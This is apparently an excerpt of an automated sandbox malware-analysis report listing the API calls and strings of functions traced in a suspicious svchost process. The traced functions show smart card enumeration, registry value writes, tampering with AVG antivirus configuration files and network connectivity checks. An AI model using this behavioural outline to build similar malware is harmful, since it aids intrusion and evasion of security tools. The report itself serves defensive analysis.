API String ID: 2510291871-1563770528
Opcode ID: e63f04f99148dba3b6b7ab9b68f6be2725fa1b7d9692b7ea7081e9efd6cc894c
Instruction ID: 4ccb169730d5804e2a1c6b65925daf7e587f849852541bb732c89dd95e9780d8
Opcode Fuzzy Hash: e63f04f99148dba3b6b7ab9b68f6be2725fa1b7d9692b7ea7081e9efd6cc894c
Instruction Fuzzy Hash: C3F030B5E80248FBE711CA91DD49FAA776CDF04B44F108699FA01E7140D770EA10A7A5

Function 02C97A50 Relevance: 10.1, APIs: 8, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AB6
HeapValidate.KERNEL32(00000000), ref: 02C97ABD
GetProcessHeap.KERNEL32(00000000,?), ref: 02C97ACA
HeapFree.KERNEL32(00000000), ref: 02C97AD1
GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AE0
HeapValidate.KERNEL32(00000000), ref: 02C97AE3
GetProcessHeap.KERNEL32(00000000,?), ref: 02C97AF0
HeapFree.KERNEL32(00000000), ref: 02C97AF3

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate
String ID:
API String ID: 1670920773-0
Opcode ID: d57ac4135c724d8a926893770527e68ed6947d970c3d55a6b6301d0a02dcde21
Instruction ID: e3683514777bb9f53f8e9e1f0d5adb4f683b40bf835c875ad3306b9d633f3255
Opcode Fuzzy Hash: d57ac4135c724d8a926893770527e68ed6947d970c3d55a6b6301d0a02dcde21
Instruction Fuzzy Hash: 1631A171E41344ABDF219F69D848BAABBA8EF84314F048589ED0597246CB30DA55CBA0

Function 02C97C50 Relevance: 10.1, APIs: 8, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dd9ec387ed50701c1fc429e50d7aecad2cca295a24366175ec6721f5963fe5a
Instruction ID: 73522fa695af89b9d5c86362f02695eeb83cddf8a9cdd84c04c25d852f89536d
Opcode Fuzzy Hash: 0dd9ec387ed50701c1fc429e50d7aecad2cca295a24366175ec6721f5963fe5a
Instruction Fuzzy Hash: 080128B2F89A446BEB216BA5FD8CF27BB5CEF80B55F044622F50597140C7319410CAB0

Function 02C96E90 Relevance: 9.1, APIs: 6, Instructions: 108fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02C96ED4
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02C97817), ref: 02C96EEE
memcpy.MSVCRT(00000000,?,?,?,02C97817), ref: 02C96F16
UnmapViewOfFile.KERNEL32(?,?,?,?,?,02C97817), ref: 02C96F22

Part of subcall function 02C93E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C93E14
Part of subcall function 02C93E00: CloseHandle.KERNEL32(?), ref: 02C93E25

memcpy.MSVCRT(?,?,00140B17,00000000,00000000,00140B17,?,02C97817), ref: 02C96F4E
WriteFile.KERNEL32(?,?,00140B17,02C97817,00000000,00140B17), ref: 02C96F80

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
String ID:
API String ID: 3741995677-0
Opcode ID: 561877f762b3af474279e7b969587dc2b61f0120eba24ebd6a8ae1e641869784
Instruction ID: da0cf13bb213f9a11f149eb5d0aceba496568976ad3535ebd0d50bc920cc0354
Opcode Fuzzy Hash: 561877f762b3af474279e7b969587dc2b61f0120eba24ebd6a8ae1e641869784
Instruction Fuzzy Hash: D9317C72A00209BBDB04DF99D884B6AF7BCFF58714F20825AE90497680D771AE60CBD0

Function 02C93D20 Relevance: 9.1, APIs: 6, Instructions: 87COMMON

Download Yara Rule

APIs

SCardEstablishContext.WINSCARD(00000002,00000000,00000000,02C856A3,00000000), ref: 02C93D45
SCardListReadersA.WINSCARD(02C856A3,00000000,?,FFFFFFFF), ref: 02C93D5C
SCardConnectA.WINSCARD(02C856A3,?,00000002,00000003,?,?), ref: 02C93D8E
SCardFreeMemory.WINSCARD(02C856A3,?), ref: 02C93DC9
SCardReleaseContext.WINSCARD(?), ref: 02C93DDD
SCardReleaseContext.WINSCARD(02C856A3), ref: 02C93DE7

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Card$Context$Release$ConnectEstablishFreeListMemoryReaders
String ID:
API String ID: 4220388116-0
Opcode ID: 573c72c4a9e818c6aef5024e680623d5f20106d5fc941ccebf31bba1b295727c
Instruction ID: c89187b9411d758a93a7aa6bb40e3e85a88ed30e947d8ebbc6ad705c09c80665
Opcode Fuzzy Hash: 573c72c4a9e818c6aef5024e680623d5f20106d5fc941ccebf31bba1b295727c
Instruction Fuzzy Hash: 12310F76E10259ABDF21CF99C858BEEB7BDEF84604F144689E915E7240D770AB04CBA0

Function 02C76930 Relevance: 8.8, APIs: 7, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E

GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,75AF5CE0,02C82897), ref: 02C7696C
HeapAlloc.KERNEL32(00000000), ref: 02C76973
memset.MSVCRT ref: 02C76983
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,75AF5CE0,02C82897), ref: 02C769A5
HeapValidate.KERNEL32(00000000), ref: 02C769A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C769B5
HeapFree.KERNEL32(00000000), ref: 02C769B8

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$File$FreeHandleValidatememset$AllocAllocateCloseCreateInformationReadSizeWrite
String ID:
API String ID: 1057660858-0
Opcode ID: f377347343ddea82a5b582f989365a99ecd9eccaf66547f3de79fc0db7b6716e
Instruction ID: 58932f77280adc2f93b47e823172b600c7e8a6d5802ac6a8ee26dcbea9958889
Opcode Fuzzy Hash: f377347343ddea82a5b582f989365a99ecd9eccaf66547f3de79fc0db7b6716e
Instruction Fuzzy Hash: 5511E572F41658A7C725ABA5AC48F9BB76CDFC0B55F140168B909D7280DB70DE14CBE0

Function 02C73750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000101,?,02C73A83), ref: 02C73784
RegQueryValueExA.KERNEL32(00000000,7d2de637a,00000000,?,00000000,?), ref: 02C737A5
RegCloseKey.ADVAPI32(00000000), ref: 02C737B3

Strings

7d2de637a, xrefs: 02C7379F
software\microsoft, xrefs: 02C7376C

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: 7d2de637a$software\microsoft
API String ID: 3677997916-1563770528
Opcode ID: 438c0b29fcafb0ee7a2b4f30c94ef07994edde75fffedb93b7823bde09dc40ab
Instruction ID: 39ce229bfdeca4e4d3475bb05b3248a25564608a45d619c53a4a46de025325d0
Opcode Fuzzy Hash: 438c0b29fcafb0ee7a2b4f30c94ef07994edde75fffedb93b7823bde09dc40ab
Instruction Fuzzy Hash: ADF03CB4E40248FBEB00CF94DD45FEEBBBCEB08704F104699EA05E7280D7B5A6048B94

Function 02C97130 Relevance: 7.6, APIs: 5, Instructions: 85timeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02C97604), ref: 02C97163
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,0000002C,00000044,00000030,0000003C,?,?,?,?,?,?,?,02C97604), ref: 02C9718B
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,02C97604), ref: 02C971B5
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,02C97604), ref: 02C971C3
FileTimeToDosDateTime.KERNEL32(?,02C97604,?), ref: 02C971D5

Part of subcall function 02C96C70: GetFileType.KERNEL32(?,00000000,00000000), ref: 02C96C79

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: FileTime$Type$DateLocalPointerSystem
String ID:
API String ID: 60630809-0
Opcode ID: 518137f2a91d0527747787b4f28273167a0e4f474879d59b772cf3842829abf8
Instruction ID: d1af3c16b96baf0a17358377f1a509a5044f62bde0d5554f7e539b76d6eef2d2
Opcode Fuzzy Hash: 518137f2a91d0527747787b4f28273167a0e4f474879d59b772cf3842829abf8
Instruction Fuzzy Hash: 8B2171B29017449FC721CF6AD9C49ABFBFCFB88214B500A6EE59AC3940D771E508CB20

Function 02C763B0 Relevance: 7.6, APIs: 5, Instructions: 81sleepthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C763D0

Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75

Sleep.KERNEL32(000001F4,?,76230F10,00000000), ref: 02C763EC
CreateThread.KERNEL32(00000000,00000000,02C76060,00000000,00000000,00000000), ref: 02C76448
WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,00000000,?,76230F10,00000000), ref: 02C76470
CloseHandle.KERNEL32(?,?,76230F10,00000000), ref: 02C76488

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: memset$CheckConnectionInternetlstrcpyn$AdminAliveCacheCloseCreateFlushHandleMultipleNetworkObjectsResolverSleepThreadUserWait
String ID:
API String ID: 2160739018-0
Opcode ID: c1c63429beed57e14c7c737aa08adcf76ba01d878508a86c29c37f994b827aff
Instruction ID: 3dc0d04ed023514038422d4c70a89f5ca956cc4b8728a668e52f9eeb92603945
Opcode Fuzzy Hash: c1c63429beed57e14c7c737aa08adcf76ba01d878508a86c29c37f994b827aff
Instruction Fuzzy Hash: CF21DDB1E80A546BEB10E760ECC5FAE72ADEB8071CF200770EE19A70C0D7709981CAD5

Function 02C86B60 Relevance: 7.6, APIs: 5, Instructions: 68sleepsynchronizationCOMMON

Download Yara Rule

APIs

PathFindFileNameA.SHLWAPI(?), ref: 02C86BAA
FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02C86BE8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02C86C03
FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02C86C0A
Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02C86C31

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
String ID:
API String ID: 433761119-0
Opcode ID: 0b609fae7a0dbe937c88966c93b64d93a14e5f869262433ddc5deab3e111d806
Instruction ID: bcfdb10e190382c844aedb08370d7e2ec974b05cb5c38baabface1b0808283fc
Opcode Fuzzy Hash: 0b609fae7a0dbe937c88966c93b64d93a14e5f869262433ddc5deab3e111d806
Instruction Fuzzy Hash: 15212730800659A7DB11A7689D54BEA7BBCEB5130CF308AE5D94193280EB70DA44CFA0

Function 02C96FF0 Relevance: 7.6, APIs: 5, Instructions: 64fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000,?), ref: 02C97017
GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97037
CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97048
GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97061
CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75AF5CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97072

Part of subcall function 02C97A50: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AB6
Part of subcall function 02C97A50: HeapValidate.KERNEL32(00000000), ref: 02C97ABD
Part of subcall function 02C97A50: GetProcessHeap.KERNEL32(00000000,?), ref: 02C97ACA
Part of subcall function 02C97A50: HeapFree.KERNEL32(00000000), ref: 02C97AD1
Part of subcall function 02C97A50: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AE0
Part of subcall function 02C97A50: HeapValidate.KERNEL32(00000000), ref: 02C97AE3
Part of subcall function 02C97A50: GetProcessHeap.KERNEL32(00000000,?), ref: 02C97AF0
Part of subcall function 02C97A50: HeapFree.KERNEL32(00000000), ref: 02C97AF3

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$HandleProcess$CloseFreeInformationValidate$FileUnmapView
String ID:
API String ID: 3732962355-0
Opcode ID: 2b3ccb1d657ac3d2b086756fef2aa2d9474852e8b5a35f85c6c781cd750fab56
Instruction ID: 8afb5dcd38b0cf55b058242d8ad3db136849feb27d825dc79ec1e2b03c97b0de
Opcode Fuzzy Hash: 2b3ccb1d657ac3d2b086756fef2aa2d9474852e8b5a35f85c6c781cd750fab56
Instruction Fuzzy Hash: EA11E6B0A423449BEB21CF65D94C72AFBF8AF85B04F1009ACD845C3241E774DA08CA90

Function 02C764D0 Relevance: 7.6, APIs: 5, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,762330D0,76233240,?,02C86C2C,?,00000000,?,?), ref: 02C764FD
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,02C86C2C,?,00000000,?,?,00000000), ref: 02C76518
SetEndOfFile.KERNEL32(00000000,?,02C86C2C,?,00000000,?,?,00000000), ref: 02C76523
GetHandleInformation.KERNEL32(00000000,00000000,?,02C86C2C,?,00000000), ref: 02C76542
CloseHandle.KERNEL32(00000000,?,02C86C2C,?,00000000), ref: 02C76553

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: File$Handle$CloseCreateInformationWrite
String ID:
API String ID: 1150544999-0
Opcode ID: ddcbb96374705cf52cbdecc391bc96d03b85cbcf8ec2711a2cff00bd067f1128
Instruction ID: 98b00093aa3a58c397da18543a5d5bb16bafac63a40451ced172bc20f7b26919
Opcode Fuzzy Hash: ddcbb96374705cf52cbdecc391bc96d03b85cbcf8ec2711a2cff00bd067f1128
Instruction Fuzzy Hash: 4111C672680A447BE7218A56EC48FAB7B5CEBC5B64F148219FE05C7185C734CA05D771

Function 02C86B86 Relevance: 7.6, APIs: 5, Instructions: 54sleepsynchronizationCOMMON

Download Yara Rule

APIs

PathFindFileNameA.SHLWAPI(?), ref: 02C86BAA
FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02C86BE8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02C86C03
FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02C86C0A
Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02C86C31

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
String ID:
API String ID: 433761119-0
Opcode ID: 8e31e683ef9638f6871f9a382b8fa0cc2f018bd0ac6f44603bf784065cfde52e
Instruction ID: 68bbfa5dd690334f510e52825f503ac55621b68adebc6cd197fbbc4c1d8dfd3f
Opcode Fuzzy Hash: 8e31e683ef9638f6871f9a382b8fa0cc2f018bd0ac6f44603bf784065cfde52e
Instruction Fuzzy Hash: 8D119130940A59ABDB21EB64DC48BEA77BCFF5130CF2486A8DA51972C0DB709A54CF61

Function 02C76060 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02C76084

Part of subcall function 02C75F50: memset.MSVCRT ref: 02C75F72
Part of subcall function 02C75F50: memset.MSVCRT ref: 02C75F90
Part of subcall function 02C75F50: lstrcpynA.KERNEL32(?,?,00000104), ref: 02C75FAD
Part of subcall function 02C75F50: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02C7601D
Part of subcall function 02C75F50: RegSetValueExA.ADVAPI32(?,7D2DE31Fa,00000000,00000001,?,00000104), ref: 02C7603F
Part of subcall function 02C75F50: RegCloseKey.ADVAPI32(?), ref: 02C7604D

GetProcessHeap.KERNEL32(00000000,?), ref: 02C760B4
HeapValidate.KERNEL32(00000000), ref: 02C760B7
GetProcessHeap.KERNEL32(00000000,?), ref: 02C760C4
RtlFreeHeap.NTDLL(00000000), ref: 02C760C7

Part of subcall function 02C75C80: memset.MSVCRT ref: 02C75CA0
Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75CE7
Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75CF6
Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75CFF
Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D09
Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D27
Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D33
Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D3C
Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D46
Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D64
Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D71
Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D7B
Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D86

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: callocexit$Heap$memset$Process$AdminCloseFreeOpenUserValidateValuelstrcpyn
String ID:
API String ID: 1120961889-0
Opcode ID: e4218edf6ba31e1397917b57c30f898167aba79f535c1c080ad9b59ea0340bec
Instruction ID: 1fcf35d9ee1f3b641c989daa45aed02a64f438b58484f111065045de3195ad55
Opcode Fuzzy Hash: e4218edf6ba31e1397917b57c30f898167aba79f535c1c080ad9b59ea0340bec
Instruction Fuzzy Hash: 97F0F032EC46246BCA202AA5AC08F8BBB5CEF807A5F140A12F508D7080CB759065CAE4

Function 02C769D0 Relevance: 7.5, APIs: 5, Instructions: 20COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,02C8797D,82c31d1a,?,?,?,?,?,?), ref: 02C769D7
GetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C769E2
IsUserAnAdmin.SHELL32 ref: 02C769EA
PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02C769F5
SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C769FC

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLast$AdminCreateDirectoryFolderMakePathSystemUser
String ID:
API String ID: 1233776721-0
Opcode ID: b1ecba415cedae85a45a6f4e2ea15c6acc10cec7b8fdc08286130b115ba33829
Instruction ID: 029d2a93728ab67eaee32f07bc64c6bb064ad0705db6a9bbf4102762476c0be3
Opcode Fuzzy Hash: b1ecba415cedae85a45a6f4e2ea15c6acc10cec7b8fdc08286130b115ba33829
Instruction Fuzzy Hash: 1FD01732E819919BD7131F31EC0CB6F766CBBC5B16F198AA4F842D3040EF34C2128665

Function 00402330 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402348
MoveFileA.KERNEL32(?,?), ref: 0040240F

Strings

\AVG\AVG9\dfncfg.dat, xrefs: 00402388
\AVG\AVG9\dfmcfg.dat, xrefs: 004023CC

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FileFolderMovePath
String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
API String ID: 1404575960-1083204512
Opcode ID: 85613be8a7ff22d3f2708ffc80a5f36b51ac17d5ce9254ffd30377348588094f
Instruction ID: 218ec206f196096905059f0fa712dce574fe6e09d85f3a618a89c2f21692c038
Opcode Fuzzy Hash: 85613be8a7ff22d3f2708ffc80a5f36b51ac17d5ce9254ffd30377348588094f
Instruction Fuzzy Hash: 43214FB45043448FC759CF14EA98B92BBF4BF98300F1581FADA89A73A2D774D944CB98

Function 02C92F00 Relevance: 6.1, APIs: 4, Instructions: 56timeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000000,00001400,00000000,00000000,7734FFB0,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F2C
GetProcessTimes.KERNEL32(00000000,02C86436,?,?,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F4A
GetHandleInformation.KERNEL32(00000000,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F68
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F79

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

